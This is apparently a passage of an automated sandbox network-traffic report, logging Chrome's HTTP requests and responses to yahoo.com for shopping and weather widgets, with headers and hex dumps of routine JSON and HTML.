                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cookie: yhome-viper=1; A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:42 UTC297OUTData Raw: 7b 22 63 6f 6e 66 69 67 22 3a 7b 22 63 70 6f 73 22 3a 35 2c 22 6d 6f 64 75 6c 65 54 69 74 6c 65 22 3a 22 42 75 79 69 6e 67 20 61 64 76 69 63 65 22 2c 22 73 6c 6f 74 74 65 64 49 6e 53 74 72 65 61 6d 22 3a 31 2c 22 78 68 72 50 61 74 68 50 72 65 66 69 78 22 3a 22 2f 66 70 5f 6d 73 2f 5f 72 63 76 2f 72 65 6d 6f 74 65 22 2c 22 65 6e 61 62 6c 65 52 43 56 22 3a 74 72 75 65 2c 22 73 68 6f 70 70 69 6e 67 43 61 72 6f 75 73 65 6c 22 3a 66 61 6c 73 65 2c 22 73 68 6f 70 70 69 6e 67 43 61 72 6f 75 73 65 6c 56 32 22 3a 66 61 6c 73 65 2c 22 73 68 6f 70 70 69 6e 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 61 68 6f 6f 2e 63 6f 6d 2f 74 6f 70 69 63 73 2f 70 72 69 6d 65 2d 64 61 79 2f 22 7d 2c 22 63 74 72 6c 22 3a 22 53 68 6f 70 70 69 6e 67 22 2c 22 6d 5f 69
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: {"config":{"cpos":5,"moduleTitle":"Buying advice","slottedInStream":1,"xhrPathPrefix":"/fp_ms/_rcv/remote","enableRCV":true,"shoppingCarousel":false,"shoppingCarouselV2":false,"shoppingUrl":"https://www.yahoo.com/topics/prime-day/"},"ctrl":"Shopping","m_i
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:42 UTC708INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              expect-ct: max-age=31536000, report-uri="http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              referrer-policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              strict-transport-security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              content-type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              status-code: 200
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-app-version: 1.0.37300
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-applet-version: 1.0.37300
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-applet-id: react-wafer-shopping
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              date: Tue, 08 Oct 2024 19:13:42 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-envoy-upstream-service-time: 9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-envoy-decorator-operation: tdv2-app-fp--mtls-production-ir2.frontpage-k8s-frontend.svc.yahoo.local:4080/*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:42 UTC787INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 66 72 61 6d 65 2d 61 6e 63 65 73 74 6f 72 73 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 62 75 69 6c 74 62 79 67 69 72 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 72 69 76 61 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 65 6e 67 61 64 67 65 74 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 69 6e 74 68 65 6b 6e 6f 77 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 75 74 6f 62 6c 6f 67 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 74 65 63 68 63 72 75 6e 63 68 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 79 61 68 6f 6f 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 6f 6c 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 68 75 66 66 69 6e 67 74 6f 6e 70 6f 73 74 2e 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Content-Security-Policy: frame-ancestors 'self' https://*.builtbygirls.com https://*.rivals.com https://*.engadget.com https://*.intheknow.com https://*.autoblog.com https://*.techcrunch.com https://*.yahoo.com https://*.aol.com https://*.huffingtonpost.c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:42 UTC5INData Raw: 35 66 64 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 5fd
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:42 UTC1300INData Raw: 7b 22 61 73 73 65 74 73 22 3a 7b 22 63 73 73 22 3a 5b 7b 22 6c 6f 63 61 74 69 6f 6e 22 3a 22 74 6f 70 22 2c 22 76 61 6c 75 65 22 3a 22 2f 61 61 71 2f 63 70 72 6f 70 73 2f 63 6f 6c 6f 72 73 5f 31 2e 31 2e 32 37 2e 6d 69 6e 2e 63 73 73 22 2c 22 6e 61 6d 65 22 3a 22 63 75 73 74 6f 6d 2d 70 72 6f 70 65 72 74 69 65 73 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 31 2e 31 2e 32 37 22 7d 2c 7b 22 6c 6f 63 61 74 69 6f 6e 22 3a 22 74 6f 70 22 2c 22 76 61 6c 75 65 22 3a 22 2f 61 61 71 2f 66 70 2f 63 73 73 2f 72 65 61 63 74 2d 77 61 66 65 72 2d 73 68 6f 70 70 69 6e 67 2e 53 68 6f 70 70 69 6e 67 2e 61 74 6f 6d 69 63 2e 6c 74 72 2e 64 31 35 36 62 35 34 31 63 30 32 38 66 65 37 64 33 31 36 37 62 31 30 31 64 31 35 35 30 30 66 36 2e 6d 69 6e 2e 63 73 73 22 2c 22 6e 61 6d 65 22
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: {"assets":{"css":[{"location":"top","value":"/aaq/cprops/colors_1.1.27.min.css","name":"custom-properties","version":"1.1.27"},{"location":"top","value":"/aaq/fp/css/react-wafer-shopping.Shopping.atomic.ltr.d156b541c028fe7d3167b101d15500f6.min.css","name"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:42 UTC233INData Raw: 6f 74 3b 7d 5c 22 20 64 61 74 61 2d 77 66 2d 74 72 69 67 67 65 72 3d 5c 22 6f 6e 4c 6f 61 64 5c 22 20 64 61 74 61 2d 77 66 2d 74 61 72 67 65 74 3d 5c 22 23 63 6f 6d 6d 65 72 63 65 2d 6d 6f 64 75 6c 65 2d 63 6f 6e 74 61 69 6e 65 72 5c 22 20 64 61 74 61 2d 77 66 2d 75 72 6c 3d 5c 22 2f 66 70 5f 6d 73 2f 5f 72 63 76 2f 72 65 6d 6f 74 65 3f 63 74 72 6c 3d 53 68 6f 70 70 69 6e 67 43 6f 6e 74 65 6e 74 26 61 6d 70 3b 6d 5f 69 64 3d 72 65 61 63 74 2d 77 61 66 65 72 2d 73 68 6f 70 70 69 6e 67 26 61 6d 70 3b 6d 5f 6d 6f 64 65 3d 6a 73 6f 6e 26 61 6d 70 3b 78 68 72 50 61 74 68 50 72 65 66 69 78 3d 25 32 46 66 70 5f 6d 73 25 32 46 5f 72 63 76 25 32 46 72 65 6d 6f 74 65 5c 22 3e 3c 2f 64 69 76 3e 22 7d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ot;}\" data-wf-trigger=\"onLoad\" data-wf-target=\"#commerce-module-container\" data-wf-url=\"/fp_ms/_rcv/remote?ctrl=ShoppingContent&amp;m_id=react-wafer-shopping&amp;m_mode=json&amp;xhrPathPrefix=%2Ffp_ms%2F_rcv%2Fremote\"></div>"}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:42 UTC5INData Raw: 0d 0a 30 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:42 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii:


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              114192.168.2.45113587.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:42 UTC1106OUTPOST /fp_ms/_rcv/remote?ctrl=WeatherPreviewRefresh&lang=en-US&m_id=react-wafer-weather&m_mode=json&region=US&rid=1fkbtbdjgb12s&site=fp&apptype=default&instance_id=weather&_evtSrc=deferLoad HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: www.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 396
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              content-type: application/json
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-webp: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Origin: https://www.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cookie: yhome-viper=1; A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:42 UTC396OUTData Raw: 7b 22 62 75 63 6b 65 74 22 3a 22 72 6f 63 6b 65 74 5f 47 41 5f 64 65 73 6b 5f 74 65 73 74 2d 33 2d 76 31 2c 73 65 61 6d 6c 65 73 73 22 2c 22 63 6f 6e 66 69 67 22 3a 7b 22 66 65 74 63 68 55 73 65 72 46 61 76 4c 6f 63 61 74 69 6f 6e 22 3a 66 61 6c 73 65 2c 22 66 65 74 63 68 55 73 69 6e 67 4e 65 77 47 72 61 76 69 74 6f 6e 42 61 63 6b 65 6e 64 22 3a 66 61 6c 73 65 2c 22 67 72 69 64 4c 61 79 6f 75 74 45 6e 61 62 6c 65 64 22 3a 74 72 75 65 2c 22 68 65 61 64 65 72 22 3a 74 72 75 65 2c 22 70 75 72 70 6c 65 42 6c 6f 63 6b 48 65 61 64 65 72 45 6e 61 62 6c 65 64 22 3a 74 72 75 65 2c 22 75 6e 69 74 22 3a 22 46 22 2c 22 78 68 72 50 61 74 68 50 72 65 66 69 78 22 3a 22 2f 66 70 5f 6d 73 2f 5f 72 63 76 2f 72 65 6d 6f 74 65 22 7d 2c 22 63 74 72 6c 22 3a 22 57 65 61 74 68
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: {"bucket":"rocket_GA_desk_test-3-v1,seamless","config":{"fetchUserFavLocation":false,"fetchUsingNewGravitonBackend":false,"gridLayoutEnabled":true,"header":true,"purpleBlockHeaderEnabled":true,"unit":"F","xhrPathPrefix":"/fp_ms/_rcv/remote"},"ctrl":"Weath
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:42 UTC732INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              expect-ct: max-age=31536000, report-uri="http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              referrer-policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              strict-transport-security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              content-type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              status-code: 200
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-app-version: 1.0.37300
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-applet-version: 1.0.37300
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-instance-id: weather
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-applet-id: react-wafer-weather
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              date: Tue, 08 Oct 2024 19:13:42 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-envoy-upstream-service-time: 21
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-envoy-decorator-operation: tdv2-app-fp--mtls-production-ir2.frontpage-k8s-frontend.svc.yahoo.local:4080/*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:42 UTC787INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 66 72 61 6d 65 2d 61 6e 63 65 73 74 6f 72 73 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 62 75 69 6c 74 62 79 67 69 72 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 72 69 76 61 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 65 6e 67 61 64 67 65 74 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 69 6e 74 68 65 6b 6e 6f 77 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 75 74 6f 62 6c 6f 67 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 74 65 63 68 63 72 75 6e 63 68 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 79 61 68 6f 6f 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 6f 6c 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 68 75 66 66 69 6e 67 74 6f 6e 70 6f 73 74 2e 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Content-Security-Policy: frame-ancestors 'self' https://*.builtbygirls.com https://*.rivals.com https://*.engadget.com https://*.intheknow.com https://*.autoblog.com https://*.techcrunch.com https://*.yahoo.com https://*.aol.com https://*.huffingtonpost.c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:42 UTC6INData Raw: 32 66 37 66 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 2f7f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:42 UTC1300INData Raw: 7b 22 61 73 73 65 74 73 22 3a 7b 22 63 73 73 22 3a 5b 7b 22 6c 6f 63 61 74 69 6f 6e 22 3a 22 74 6f 70 22 2c 22 76 61 6c 75 65 22 3a 22 2f 61 61 71 2f 63 70 72 6f 70 73 2f 63 6f 6c 6f 72 73 5f 31 2e 31 2e 32 37 2e 6d 69 6e 2e 63 73 73 22 2c 22 6e 61 6d 65 22 3a 22 63 75 73 74 6f 6d 2d 70 72 6f 70 65 72 74 69 65 73 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 31 2e 31 2e 32 37 22 7d 2c 7b 22 6c 6f 63 61 74 69 6f 6e 22 3a 22 74 6f 70 22 2c 22 76 61 6c 75 65 22 3a 22 2f 61 61 71 2f 66 70 2f 63 73 73 2f 72 65 61 63 74 2d 77 61 66 65 72 2d 77 65 61 74 68 65 72 2e 57 65 61 74 68 65 72 50 72 65 76 69 65 77 52 65 66 72 65 73 68 2e 61 74 6f 6d 69 63 2e 6c 74 72 2e 32 61 32 35 31 61 30 64 64 62 33 64 37 63 34 65 63 31 33 66 34 65 33 35 65 65 33 35 64 64 32 62 2e 6d 69 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: {"assets":{"css":[{"location":"top","value":"/aaq/cprops/colors_1.1.27.min.css","name":"custom-properties","version":"1.1.27"},{"location":"top","value":"/aaq/fp/css/react-wafer-weather.WeatherPreviewRefresh.atomic.ltr.2a251a0ddb3d7c4ec13f4e35ee35dd2b.min
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:42 UTC1271INData Raw: 65 72 6e 2e 6a 73 22 2c 22 6e 61 6d 65 22 3a 22 77 61 66 65 72 2d 69 6d 61 67 65 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 31 2e 34 2e 30 22 7d 5d 7d 2c 22 64 61 74 61 22 3a 7b 7d 2c 22 68 74 6d 6c 22 3a 22 3c 64 69 76 20 69 64 3d 5c 22 67 72 69 64 2d 6c 61 79 6f 75 74 5c 22 20 63 6c 61 73 73 3d 5c 22 77 65 61 74 68 65 72 2d 63 61 72 64 5c 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 5c 22 44 28 66 29 20 41 69 28 63 29 20 4a 63 28 73 62 29 20 4d 62 28 31 34 70 78 29 5c 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 5c 22 44 28 66 29 20 41 69 28 63 29 5c 22 3e 3c 69 20 63 6c 61 73 73 3d 5c 22 48 28 31 36 70 78 29 20 42 64 65 6e 64 77 28 38 70 78 29 20 4d 65 6e 64 28 31 32 70 78 29 20 42 64 65 6e 64 73 28 73 29 20 42 64 72 73 28 32 70 78 29 20 42 64 65 6e 64 63 28 2d 2d 68
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ern.js","name":"wafer-image","version":"1.4.0"}]},"data":{},"html":"<div id=\"grid-layout\" class=\"weather-card\"><div class=\"D(f) Ai(c) Jc(sb) Mb(14px)\"><div class=\"D(f) Ai(c)\"><i class=\"H(16px) Bdendw(8px) Mend(12px) Bdends(s) Bdrs(2px) Bdendc(--h
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:42 UTC1300INData Raw: 2d 32 2e 35 20 32 2e 35 2d 32 2e 35 53 31 34 20 38 2e 31 31 20 31 34 20 39 2e 34 39 73 2d 31 2e 31 32 20 32 2e 35 2d 32 2e 35 20 32 2e 35 4d 31 31 2e 35 20 31 43 36 2e 38 30 36 20 31 20 33 20 34 2e 38 30 33 20 33 20 39 2e 34 39 33 63 30 20 33 2e 39 35 37 20 35 2e 37 20 31 30 2e 39 36 37 20 37 2e 35 39 32 20 31 33 2e 30 32 2e 35 37 34 2e 36 32 35 20 31 2e 31 36 37 2e 36 32 33 20 31 2e 37 34 20 30 43 31 34 2e 31 38 20 32 30 2e 35 31 34 20 32 30 20 31 33 2e 34 38 20 32 30 20 39 2e 34 39 34 20 32 30 20 34 2e 38 30 33 20 31 36 2e 31 39 34 20 31 20 31 31 2e 35 20 31 5c 22 3e 3c 2f 70 61 74 68 3e 3c 2f 73 76 67 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 5c 22 48 69 64 64 65 6e 5c 22 3e 56 69 65 77 20 79 6f 75 72 20 4c 6f 63 61 74 69 6f 6e 73 3c 2f 73 70 61 6e 3e 3c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: -2.5 2.5-2.5S14 8.11 14 9.49s-1.12 2.5-2.5 2.5M11.5 1C6.806 1 3 4.803 3 9.493c0 3.957 5.7 10.967 7.592 13.02.574.625 1.167.623 1.74 0C14.18 20.514 20 13.48 20 9.494 20 4.803 16.194 1 11.5 1\"></path></svg><span class=\"Hidden\">View your Locations</span><
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:42 UTC1300INData Raw: 6f 6e 73 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 73 76 67 20 63 6c 61 73 73 3d 5c 22 50 65 28 6e 29 20 43 75 72 28 70 29 5c 22 20 77 69 64 74 68 3d 5c 22 31 34 5c 22 20 73 74 79 6c 65 3d 5c 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 6f 70 3b 66 69 6c 6c 3a 76 61 72 28 2d 2d 77 68 69 74 65 29 3b 73 74 72 6f 6b 65 3a 76 61 72 28 2d 2d 77 68 69 74 65 29 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 5c 22 20 68 65 69 67 68 74 3d 5c 22 31 34 5c 22 20 76 69 65 77 42 6f 78 3d 5c 22 30 20 30 20 34 38 20 34 38 5c 22 20 64 61 74 61 2d 69 63 6f 6e 3d 5c 22 72 65 6d 6f 76 65 5c 22 3e 3c 70 61 74 68 20 64 3d 5c 22 4d 34 30 20 32 32 48 38 63 2d 31 2e 31 30 34 20 30 2d 32 20 2e 38 39 36 2d 32 20 32 73 2e 38 39 36 20 32 20 32 20 32 68 33 32 63 31 2e 31 30 34
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ons</span></span><svg class=\"Pe(n) Cur(p)\" width=\"14\" style=\"vertical-align:top;fill:var(--white);stroke:var(--white);stroke-width:0\" height=\"14\" viewBox=\"0 0 48 48\" data-icon=\"remove\"><path d=\"M40 22H8c-1.104 0-2 .896-2 2s.896 2 2 2h32c1.104
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:42 UTC1300INData Raw: 20 31 31 2e 34 34 37 2d 31 31 2e 33 34 36 68 32 2e 33 31 63 2e 36 33 20 30 20 31 2e 31 34 35 2d 2e 35 31 35 20 31 2e 31 34 35 2d 31 2e 31 35 20 30 2d 2e 36 33 33 2d 2e 35 31 36 2d 31 2e 31 34 35 2d 31 2e 31 34 36 2d 31 2e 31 34 35 68 2d 32 2e 33 63 2d 2e 35 32 2d 36 2e 30 37 38 2d 35 2e 33 37 2d 31 30 2e 39 33 36 2d 31 31 2e 34 35 36 2d 31 31 2e 34 38 35 56 31 2e 30 34 35 63 30 2d 2e 36 33 33 2d 2e 35 31 36 2d 31 2e 31 34 37 2d 31 2e 31 35 2d 31 2e 31 34 37 7a 4d 31 34 2e 38 30 32 20 35 2e 36 32 76 32 2e 33 31 63 30 20 2e 36 33 34 2e 35 31 32 20 31 2e 31 34 36 20 31 2e 31 34 36 20 31 2e 31 34 36 2e 36 33 34 20 30 20 31 2e 31 34 38 2d 2e 35 31 32 20 31 2e 31 34 38 2d 31 2e 31 34 36 56 35 2e 36 32 63 34 2e 38 32 2e 35 33 33 20 38 2e 36 35 33 20 34 2e 33 37
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 11.447-11.346h2.31c.63 0 1.145-.515 1.145-1.15 0-.633-.516-1.145-1.146-1.145h-2.3c-.52-6.078-5.37-10.936-11.456-11.485V1.045c0-.633-.516-1.147-1.15-1.147zM14.802 5.62v2.31c0 .634.512 1.146 1.146 1.146.634 0 1.148-.512 1.148-1.146V5.62c4.82.533 8.653 4.37
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:42 UTC1300INData Raw: 32 2e 35 35 20 31 36 2e 33 36 34 20 31 30 2e 38 35 20 31 37 20 39 20 31 37 63 2d 34 2e 34 31 38 20 30 2d 38 2d 33 2e 35 38 32 2d 38 2d 38 20 30 2d 34 2e 34 32 20 33 2e 35 38 32 2d 38 20 38 2d 38 73 38 20 33 2e 35 38 20 38 20 38 63 30 20 31 2e 38 35 2d 2e 36 33 34 20 33 2e 35 35 2d 31 2e 36 39 20 34 2e 39 30 35 6c 37 2e 34 30 33 20 37 2e 34 30 34 63 2e 33 39 2e 33 38 36 2e 33 39 20 31 2e 30 31 35 20 30 20 31 2e 34 30 33 5c 22 3e 3c 2f 70 61 74 68 3e 3c 2f 73 76 67 3e 3c 64 69 76 20 63 6c 61 73 73 3d 5c 22 50 6f 73 28 72 29 20 57 28 31 30 30 25 29 5c 22 3e 3c 6c 61 62 65 6c 20 63 6c 61 73 73 3d 5c 22 44 28 6e 29 5c 22 20 66 6f 72 3d 5c 22 77 65 61 74 68 65 72 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 5c 22 3e 45 6e 74 65 72 20 43 69 74 79 20 6f 72 20 5a 69 70
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 2.55 16.364 10.85 17 9 17c-4.418 0-8-3.582-8-8 0-4.42 3.582-8 8-8s8 3.58 8 8c0 1.85-.634 3.55-1.69 4.905l7.403 7.404c.39.386.39 1.015 0 1.403\"></path></svg><div class=\"Pos(r) W(100%)\"><label class=\"D(n)\" for=\"weather-autocomplete\">Enter City or Zip
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:42 UTC971INData Raw: 74 65 64 77 65 61 74 68 65 72 4c 6f 63 61 74 69 6f 6e 55 75 69 64 5d 5c 22 20 69 64 3d 5c 22 77 65 61 74 68 65 72 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 5c 22 20 6e 61 6d 65 3d 5c 22 6c 6f 63 61 74 69 6f 6e 2d 70 69 63 6b 65 72 5c 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 5c 22 45 6e 74 65 72 20 43 69 74 79 20 6f 72 20 5a 69 70 63 6f 64 65 5c 22 20 73 70 65 6c 6c 63 68 65 63 6b 3d 5c 22 66 61 6c 73 65 5c 22 20 74 61 62 69 6e 64 65 78 3d 5c 22 30 5c 22 20 74 69 74 6c 65 3d 5c 22 53 65 61 72 63 68 5c 22 2f 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 6c 69 3e 3c 6c 69 20 69 64 3d 5c 22 77 65 61 74 68 65 72 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 2d 73 75 67 67 65 73 74 69 6f 6e 73 5c 22 20 63 6c 61 73 73 3d 5c 22 4f 76 28 61 29 20 4d 61 68 28 38 36 70 78 29
